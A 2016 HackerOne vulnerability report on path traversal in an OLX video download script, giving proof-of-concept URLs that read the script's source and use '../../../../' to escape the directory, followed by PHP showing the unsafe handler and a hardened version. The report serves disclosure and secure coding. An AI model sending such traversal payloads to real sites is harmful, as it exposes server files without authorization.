OLX: Arbitrary File Reading

2016-07-12T00:29:37
ID H1:150783
Type hackerone
Reporter konqi
Modified 2016-08-12T15:30:33

Description

Hi!

The script for video downloading doesn't properly filter the input filename, and it's possible to read arbitrary files from the file system.

PoC

http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=download.php
http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=../../../../b<<
http://makeyourad1.olx.in/converted/final/ready/madeit/download.php?file=../../../../c<<

Screenshots are attached below.
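The pattern the report describes, and one way to harden it, as an added example that is not the OLX script: a download handler that takes a file name from the request, first in the unsafe form (the name is used as a path as-is, so `download.php` returns the script's own source and `../../../../` walks out of the directory), then a version that only serves files resolving inside a fixed directory. The directory `/var/www/videos` and the `mp4`/`webm` allowlist are assumptions.

```php
<?php
// Unsafe form: the request parameter becomes part of the path unchecked.
function serve_unsafe(string $baseDir, string $file): void
{
    header('Content-Type: application/octet-stream');
    readfile($baseDir . '/' . $file);
}

// Hardened form: returns the resolved path, or null when the request must be refused.
function resolve_download(string $baseDir, string $file, array $allowedExt): ?string
{
    // Only a bare file name is accepted; any directory component (including "..") is rejected.
    $name = basename($file);
    if ($name === '' || $name !== $file) {
        return null;
    }
    // Extension allowlist: the script itself (.php) and other non-media files are never served.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!in_array($ext, $allowedExt, true)) {
        return null;
    }
    // realpath() collapses symlinks and returns false for missing files,
    // so the prefix check runs against the file's final location.
    $root = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($root === false || $path === false) {
        return null;
    }
    if (strncmp($path, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null; // resolved outside the allowed directory (e.g. via a symlink)
    }
    return $path;
}

function serve_safe(string $baseDir, string $file): void
{
    $path = resolve_download($baseDir, $file, ['mp4', 'webm']);
    if ($path === null) {
        http_response_code(404);
        exit('Not found');
    }
    header('Content-Type: application/octet-stream');
    readfile($path);
}

// Assumed location of the converted videos.
serve_safe('/var/www/videos', $_GET['file'] ?? '');
```

With this check, `file=download.php` is refused by the extension allowlist and `file=../../../../b` is refused because `basename()` changes it, before any path is touched.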